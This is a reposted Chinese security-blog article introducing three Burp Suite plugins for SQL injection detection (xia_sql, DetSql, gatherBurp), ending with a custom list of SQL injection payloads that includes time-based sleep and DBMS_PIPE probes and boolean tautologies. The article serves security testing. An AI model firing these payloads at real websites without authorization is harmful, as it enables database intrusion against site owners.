burpsuite SQL注入插件

admin 2024年12月8日11:51:40评论26 views字数 1306阅读4分21秒阅读模式

burpsuite当中用于测试SQL注入的插件

burpsuite SQL注入插件

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途给予盈利等目的,否则后果自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢

burpsuite SQL注入插件

xia_sql

https://github.com/smxiazi/xia_sql

本插件仅只插入单引号,没有其他盲注啥的,且返回的结果需要人工介入去判断是否存在注入,如果需要所有注入都测试,请把burp的流量转发到xray。

DetSql

https://github.com/saoshao/DetSql

DetSql是基于 BurpSuite Java 插件 API 开发的 SQL 注入探测插件,主要作用为快速从 http 流量中筛选出可能存在 SQL 注入的请求,在尽可能减少拦截的情况下提高 SQL 注入测试效率。

注意DetSql采用 Montoya API 进行开发,BurpSuite 版本需满足(>=2023.12.1)。

判断方式

为方便叙述使用 value 表示请求的一个参数值,respbody 表示该请求的响应体,value->respbody,表示参数值为 value 时发送请求得到响应体 respbody,以下判断依赖 MySQL,sqlserver,oracle,postgresql 四种数据库某版本测试结果。

gatherBurp

https://github.com/kN6jq/gatherBurp

一款强大的 burp 安全测试插件,集成多种安全测试功能,支持自动化扫描和手动测试。

所有功能均可通过右键菜单快速调用:

burpsuite SQL注入插件  

自定义payload

'%20and%20sleep(3)%23

'/**/and/**/'6'='6

'/**/and/**/'6'='7

'/**/or/**/'6'='6

'/**/or/**/'6'='7

'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('p',5)='p

'/**/or/**/DBMS_PIPE.RECEIVE_MESSAGE('p',5)='p

'/**/and/**/(select%206620%20from%20(select(sleep(5)))mldt)/**/and/**/'1'='1

/**/and/**/4=4

/**/and/**/4=5

/**/or/**/4=4

/**/or/**/4=5

/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('p',5)=2

/**/or/**/DBMS_PIPE.RECEIVE_MESSAGE('p',5)=2

/**/and/**/(select%206620%20from%20(select(sleep(5)))mldt)/**/and/**/2=2

'

''

')

')('

0'XOR(if(1,sleep(6),0))XOR'Z

/*xx*/

/*xx*

'/*xx*/'

'/*xx*'

"/*xx*/"

"/*xx*"

参考资料

https://mp.weixin.qq.com/s/AbCXP4aCGALkWl_nIXDewg

原文始发于微信公众号(进击的HACK):burpsuite SQL注入插件

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月8日11:51:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   burpsuite SQL注入插件http://cn-sec.com/archives/3481921.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息